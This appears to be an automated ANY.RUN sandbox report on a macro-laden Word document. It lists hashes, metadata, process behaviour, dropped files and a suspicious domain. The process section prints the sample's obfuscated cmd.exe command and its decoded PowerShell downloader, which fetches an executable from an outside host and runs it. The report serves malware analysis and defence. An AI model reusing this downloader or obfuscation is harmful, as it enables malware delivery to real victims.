analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

539ecca8b99ef55f41b43a78cd92bd4d7e0ed023063735f0d59f483a6d0de298

Full analysis: https://app.any.run/tasks/0ae8a24a-f6fb-4350-adcf-d7abc7e731b3
Verdict: Malicious activity
Analysis date: January 22, 2019, 15:02:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Icyzhymypevupuj-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 12 07:52:00 2018, Last Saved Time/Date: Wed Sep 12 07:52:00 2018, Number of Pages: 1, Number of Words: 8, Number of Characters: 48, Security: 0
MD5:

CCD53D34C6D61DFCE9A42AACE3956546

SHA1:

2027FABC044797A23EF99B62DE704222EE8A8B00

SHA256:

539ECCA8B99EF55F41B43A78CD92BD4D7E0ED023063735F0D59F483A6D0DE298

SSDEEP:

768:lYpJcaUitGAlmrJpmxlzC+w99NBc+1AXKqAeCDjgAKTk:WptJlmrJpmxlRw99NBc+ycDiT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2932)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2932)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3444)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2608)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2932)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 14
CharCountWithSpaces: 55
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 48
Words: 8
Pages: 1
ModifyDate: 2018:09:12 06:52:00
CreateDate: 2018:09:12 06:52:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Icyzhymypevupuj-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\539ecca8b99ef55f41b43a78cd92bd4d7e0ed023063735f0d59f483a6d0de298.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3444cmd /V^:^O/C"^se^t ^ol^J= ^ ^ ^ ^ ^ ^ ^ ^ }^}{hctac^}^;ka^erb^;^Mn^K^$^ me^t^I-^ekovnI;)^MnK^$ ^,^sVV$(^e^li^F^daolnwoD^.ThZ$^{^yrt{)z^jE$ n^i sVV$(hca^ero^f^;^'exe.'+VJ^G^$^+'^\^'^+ci^lbup:vne$^=Mn^K^$^;^'28^4' =^ VJ^G$^;)'@^'(t^ilp^S.'nkt^.^4emiz^=l^?^php.^to^ksna^p^o/^TTR/^m^oc.^w^iq^ya^230^l^4t^j4//^:^ptt^h'=^z^j^E^$^;tnei^lCbeW.t^eN tce^jb^o-^w^en^=Th^Z^$^ ^lle^hsr^e^w^o^p&&^f^or /^L %^M ^in (26^3,^-^1^,0)d^o ^s^et V^d^D=!V^d^D!!^ol^J:~%^M,1!&&^i^f %^M ^l^ss ^1 c^al^l %V^d^D:*V^d^D!^=%" C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2608powershell $ZhT=new-object Net.WebClient;$Ejz='http://4jt4l032ayqiw.com/RTT/opanskot.php?l=zime4.tkn'.Split('@');$GJV = '482';$KnM=$env:public+'\'+$GJV+'.exe';foreach($VVs in $Ejz){try{$ZhT.DownloadFile($VVs, $KnM);Invoke-Item $KnM;break;}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 193
Read events
792
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE6AB.tmp.cvr
MD5:
SHA256:
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7PPV07PJO768MTHT0T6J.temp
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\539ecca8b99ef55f41b43a78cd92bd4d7e0ed023063735f0d59f483a6d0de298.doc.LNKlnk
MD5:0D3B59DC0402C3B98F0548E6CBC06F41
SHA256:EDDD551CF8A3503C67A771D8A0F452758B7407B0AFC65D27ABB95798E4B7DA81
2932WINWORD.EXEC:\Users\admin\Desktop\~$9ecca8b99ef55f41b43a78cd92bd4d7e0ed023063735f0d59f483a6d0de298.docpgc
MD5:53EAB034497227576EEBF78BEB32DC6B
SHA256:6EC0847999512766F262BCF3BE41D8022244AC5BB4793B4A98BA6B008811C108
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f4d4.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:593EAD02B5E0F4803BF4F6D7901797BA
SHA256:3F4C4559E59552DE04CB3C672E89555440B7BD90DC217BC5C321ACE303C75F67
2932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B0A906D762B73BFC857E5C8DD396A3E7
SHA256:6B4095710AEEFE100C077B97909AE1525609C4E9387C080C842F92AA181B01F1
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
4jt4l032ayqiw.com
suspicious

Threats

No threats detected
No debug info